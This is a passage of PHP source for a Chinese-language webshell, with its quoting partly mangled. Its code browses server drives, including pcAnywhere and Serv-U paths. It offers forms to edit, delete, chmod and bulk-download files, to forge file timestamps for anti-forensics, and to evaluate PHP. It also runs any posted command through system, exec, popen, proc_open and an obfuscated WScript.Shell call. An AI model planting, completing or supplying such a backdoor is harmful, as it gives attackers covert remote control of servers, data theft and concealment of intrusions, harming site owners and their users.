echo "<a href="\" href="\""?dir=C:/Program%20Files/\">Program</a> | <a href="\" href="\""?dir=C:/Documents%20and%20Settings/All%20Users/Application%20Data/Symantec/pcAnywhere\">pcAnywhere</a> | <a href="\" href="\""?dir=C:/Documents%20and%20Settings/All%20Users/「开始」菜单/程序\">开始程序</a> | <a href="\" href="\""?dir=C:/Documents%20and%20Settings/All%20Users\">AllUsers</a> | <a href="\" href="\""?dir=C:/Program Files/RhinoSoft.com/Serv-U\">Serv-U</a> | ";
for ($i=66;$i<=90;$i++){$drive= chr($i).':';
if (is_dir($drive."/")){$vol=shelL("vol $drive");if(empty($vol))$vol=$drive;echo " <a title=\"$drive/\" href="\" href="\""?dir=$drive/\">$drive\\</a>";}
}
}
echo "</b></p>\n";
/*===================== 执行操作 结束 =====================*/
if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) {
$tb->tableheader();
?>
<tr bgcolor="#cccccc">
<td align="center" nowrap width="27%"><b>文件</b></td>
<td align="center" nowrap width="16%"><b>创建日期</b></td>
<td align="center" nowrap width="16%"><b>最后修改</b></td>
<td align="center" nowrap width="11%"><b>大小</b></td>
<td align="center" nowrap width="6%"><b>属性</b></td>
<td align="center" nowrap width="24%"><b>操作</b></td>
</tr>
<FORM action="" method="POST">
<?php
// 目录列表
$dirs=@opendir($dir);
$dir_i = '0';
while ($file=@readdir($dirs)) {
$filepath="$dir/$file";
$a=@is_dir($filepath);
if($a=="1"){
if($file!=".." && $file!=".") {
$ctime=@date("Y-m-d H:i:s",@filectime($filepath));
$mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
$dirperm=substr(base_convert(fileperms($filepath),10,8),-4);
echo "<tr class=".getrowbg().">\n";
echo " <td style="\" style="\""padding-left: 5px;\"><INPUT type=checkbox value=$file name=dl[]> [<a href="\" href="\""?dir=".urlencode($dir)."/".urlencode($file)."\"><font color=\"#006699\">$file</font></a>]</td>\n";
echo " <td align=\"center\" nowrap class=\"smlfont\">$ctime</td>\n";
echo " <td align=\"center\" nowrap class=\"smlfont\">$mtime</td>\n";
echo " <td align=\"center\" nowrap class=\"smlfont\"><a href="\" href="\""?action=search&dir=".$filepath."\">Search</a></td>\n";
echo " <td align=\"center\" nowrap class=\"smlfont\"><a href="\" href="\""?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$dirperm</a></td>\n";
echo " <td align=\"center\" nowrap>| <a href="\" href="\""#\" onclick=\"really('".urlencode($dir)."','".urlencode($file)."','你确定要删除 $file 目录吗? \\n\\n如果该目录非空,此次操作将会删除该目录下的所有文件!','1')\">删除</a> | <a href="\" href="\""?action=rename&dir=".urlencode($dir)."&fname=".urlencode($file)."\">改名</a> |</td>\n";
echo "</tr>\n";
$dir_i++;
} else {
if($file=="..") {
echo "<tr class=".getrowbg().">\n";
echo " <td nowrap colspan=\"6\" style="\" style="\""padding-left: 5px;\"><a href="\" href="\""?dir=".urlencode($dir)."/".urlencode($file)."\">返回上级目录</a></td>\n";
echo "</tr>\n";
}
}
}
}// while
@closedir($dirs);
?>
<tr bgcolor="#cccccc">
<td colspan="6" height="5"></td>
</tr>
<?
// 文件列表
$dirs=@opendir($dir);
$file_i = '0';
while ($file=@readdir($dirs)) {
$filepath="$dir/$file";
$a=@is_dir($filepath);
if($a=="0"){
$size=@filesize($filepath);
$size=$size/1024 ;
$size= @number_format($size, 3);
if (@filectime($filepath) == @filemtime($filepath)) {
$ctime=@date("Y-m-d H:i:s",@filectime($filepath));
$mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
} else {
$ctime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filectime($filepath))."</span>";
$mtime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filemtime($filepath))."</span>";
}
@$fileperm=substr(base_convert(@fileperms($filepath),10,8),-4);
echo "<tr class=".getrowbg().">\n";
echo " <td style="\" style="\""padding-left: 5px;\">";
echo "<INPUT type=checkbox value=$file name=dl[]>";
echo "<a href="\" href="\""$filepath\" target=\"_blank\">$file</a></td>\n";
echo " <td align=\"center\" nowrap class=\"smlfont\">$ctime</td>\n";
echo " <td align=\"center\" nowrap class=\"smlfont\">$mtime</td>\n";
echo " <td align=\"right\" nowrap class=\"smlfont\"><span class=\"redfont\">$size</span> KB</td>\n";
echo " <td align=\"center\" nowrap class=\"smlfont\"><a href="\" href="\""?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$fileperm</a></td>\n";
echo " <td align=\"center\" nowrap><a href="\" href="\""?downfile=".urlencode($filepath)."\">下载</a> | <a href="\" href="\""?action=editfile&dir=".urlencode($dir)."&editfile=".urlencode($file)."\">编辑</a> | <a href="\" href="\""#\" onclick=\"really('".urlencode($dir)."','".urlencode($filepath)."','你确定要删除 $file 文件吗?','2')\">删除</a> | <a href="\" href="\""?action=rename&dir=".urlencode($dir)."&fname=".urlencode($filepath)."\">改名</a> | <a href="\" href="\""?action=newtime&dir=".urlencode($dir)."&file=".urlencode($filepath)."\">时间</a></td>\n";
echo "</tr>\n";
$file_i++;
}
}// while
@closedir($dirs);
if(get_cfg_var('safemode'))$z = "<a href="\" href="\""#\" title=\"使用说明\" onclick=\"alert('Php为安全模式尽量少打包内容以免脚本超时\\n\\n填写文件名则把文件保存在本地方便操作,不填则直接下载。')\">(?)</a>";
else $z = "<a href="\" href="\""#\" title=\"使用说明\" onclick=\"alert('Php运行非安全模式,打包大件请等啊等啊等啊等\\n\\n填写文件名则把文件保存在本地方便操作,不填则直接下载。')\">(?)</a>";
$tb->tdbody('<table width="100%" border="0" cellpadding="2" cellspacing="0" align="center"><tr><td>'.$tb->makeinput('chkall','on','onclick="CheckAll(this.form)"','checkbox','30','').' 本地文件:'.$tb->makeinput('localfile','','','text','15').''.$tb->makeinput('downrar','选中打包下载或本地保存','','submit').' '.$z.'</td><td align="right">'.$dir_i.' 个目录 / '.$file_i.' 个文件</td></tr></table>','center',getrowbg(),'','','6');
echo "</FORM>\n";
echo "</table>\n";
}// end dir
elseif ($_GET['action'] == "editfile") {
if(empty($newfile)) {
$filename="$dir/$editfile";
$fp=@fopen($filename,"r");
$contents=@fread($fp, filesize($filename));
@fclose($fp);
$contents=htmlspecialchars($contents);
}else{
$editfile=$newfile;
$filename = "$dir/$editfile";
}
$action = "?dir=".urlencode($dir)."&editfile=".$editfile;
$tb->tableheader();
$tb->formheader($action,'新建/编辑文件');
$tb->tdbody('当前文件: '.$tb->makeinput('editfilename',$filename).' 输入新文件名则建立新文件 Php代码加密: <input type="checkbox" name="change" value="yes" onclick="javascript:alert(\'这个功能只可以用来加密或是压缩完整的php代码。\\n\\n非php代码或不完整php代码或不支持gzinflate函数请不要使用!\')"> ');
$tb->tdbody($tb->maketextarea('filecontent',$contents));
$tb->makehidden('do','doeditfile');
$tb->formfooter('1','30');
}//end editfile
elseif ($_GET['action'] == "rename") {
$nowfile = (isset($_POST['newname'])) ? $_POST['newname'] : basename($_GET['fname']);
$action = "?dir=".urlencode($dir)."&fname=".urlencode($fname);
$tb->tableheader();
$tb->formheader($action,'修改文件名');
$tb->makehidden('oldname',$dir."/".$nowfile);
$tb->makehidden('dir',$dir);
$tb->tdbody('当前文件名: '.basename($nowfile));
$tb->tdbody('改名为: '.$tb->makeinput('newname'));
$tb->makehidden('do','rename');
$tb->formfooter('1','30');
}//end rename
elseif ($_GET['action'] == "eval") {
$action = "?dir=".urlencode($dir)."";
$tb->tableheader();
$tb->formheader(''.$action.' "target="_blank' ,'执行php脚本');
$tb->tdbody($tb->maketextarea('phpcode',$contents));
$tb->formfooter('1','30');
}
elseif ($_GET['action'] == "fileperm") {
$action = "?dir=".urlencode($dir)."&file=".$file;
$tb->tableheader();
$tb->formheader($action,'修改文件属性');
$tb->tdbody('修改 '.$file.' 的属性为: '.$tb->makeinput('fileperm',substr(base_convert(fileperms($dir.'/'.$file),10,8),-4)));
$tb->makehidden('file',$file);
$tb->makehidden('dir',urlencode($dir));
$tb->makehidden('do','editfileperm');
$tb->formfooter('1','30');
}//end fileperm
elseif ($_GET['action'] == "newtime") {
$action = "?dir=".urlencode($dir);
$cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
$tb->tableheader();
$tb->formheader($action,'克隆文件最后修改时间');
$tb->tdbody("修改文件: ".$tb->makeinput('curfile',$file,'readonly')." → 目标文件: ".$tb->makeinput('tarfile','需填完整路径及文件名'),'center','2','30');
$tb->makehidden('do','domodtime');
$tb->formfooter('','30');
$tb->formheader($action,'自定义文件最后修改时间');
$tb->tdbody('<br><ul><li>有效的时间戳典型范围是从格林威治时间 1901 年 12 月 13 日 星期五 20:45:54 到 2038年 1 月 19 日 星期二 03:14:07<br>(该日期根据 32 位有符号整数的最小值和最大值而来)</li><li>说明: 日取 01 到 30 之间, 时取 0 到 24 之间, 分和秒取 0 到 60 之间!</li></ul>','left');
$tb->tdbody('当前文件名: '.$file);
$tb->makehidden('curfile',$file);
$tb->tdbody('修改为: '.$tb->makeinput('year','1984','','text','4').' 年 '.$tb->makeselect(array('name'=>'month','option'=>$cachemonth,'selected'=>'October')).' 月 '.$tb->makeinput('data','18','','text','2').' 日 '.$tb->makeinput('hour','20','','text','2').' 时 '.$tb->makeinput('minute','00','','text','2').' 分 '.$tb->makeinput('second','00','','text','2').' 秒','center','2','30');
$tb->makehidden('do','modmytime');
$tb->formfooter('1','30');
}//end newtime
elseif ($_GET['action'] == "shell") {
$action = "??action=shell&dir=".urlencode($dir);
$tb->tableheader();
$tb->tdheader('WebShell Mode');
if (substr(PHP_OS, 0, 3) == 'WIN') {
$program = isset($_POST['program']) ? $_POST['program'] : "c:\winnt\system32\cmd.exe";
$prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname."/upload/tech/20091012/20091012020853_3c7781a36bcd6cf08c11a970fbe0e2a6.txt";
echo "<form action=\"?action=shell&dir=".urlencode($dir)."\" method=\"POST\">\n";
$tb->tdbody('无回显运行程序 → 文件: '.$tb->makeinput('program',$program).' 参数: '.$tb->makeinput('prog',$prog,'','text','40').' '.$tb->makeinput('','Run','','submit'),'center','2','35');
$tb->makehidden('do','programrun');
echo "</form>\n";
}
echo "<form action=\"?action=shell&dir=".urlencode($dir)."\" method=\"POST\">\n";
if(isset($_POST['cmd'])) $cmd = $_POST['cmd'];
$tb->tdbody('提示:如果输出结果不完全,建议把输出结果写入文件.这样可以得到全部内容. ');
$tb->tdbody('proc_open函数假设不是默认的winnt系统请自行设置使用,自行修改记得写退出,否则会在主机上留下一个未结束的进程.');
$tb->tdbody('proc_open函数要使用的cmd程序的位置:'.$tb->makeinput('cmd',$cmd,'','text','30').'(要是是linux系统还是大大们自己修改吧)');
$execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell','proc_open'=>'proc_open') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','proc_open'=>'proc_open');
$tb->tdbody('选择执行函数: '.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' 输入命令: '.$tb->makeinput('command',$_POST['command'],'','text','60').' '.$tb->makeinput('','Run','','submit'));
?>
<tr class="secondalt">
<td align="center"><textarea name="textarea" cols="100" rows="25" readonly><?php
if (!empty($_POST['command'])) {
if ($execfunc=="system") {
system($_POST['command']);
} elseif ($execfunc=="passthru") {
passthru($_POST['command']);
} elseif ($execfunc=="exec") {
$result = exec($_POST['command']);
echo $result;
} elseif ($execfunc=="shell_exec") {
$result=shell_exec($_POST['command']);
echo $result;
} elseif ($execfunc=="popen") {
$pp = popen($_POST['command'], 'r');
$read = fread($pp, 2096);
echo $read;
pclose($pp);
} elseif ($execfunc=="wscript") {
$wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll') or die("PHP Create COM WSHSHELL failed");
$exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['command']."");
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
} elseif($execfunc=="proc_open"){
$descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("pipe", "w")
);
$process = proc_open("".$_POST['cmd']."", $descriptorspec, $pipes);
if (is_resource($process)) {
// 写命令
fwrite($pipes[0], "".$_POST['command']."\r\n");
fwrite($pipes[0], "exit\r\n");
fclose($pipes[0]);
// 读取输出
while (!feof($pipes[1])) {
echo fgets($pipes[1], 1024);
}
fclose($pipes[1]);
while (!feof($pipes[2])) {
echo fgets($pipes[2], 1024);
}
fclose($pipes[2]);
proc_close($process);
}
} else {
system($_POST['command']);
}
}
?>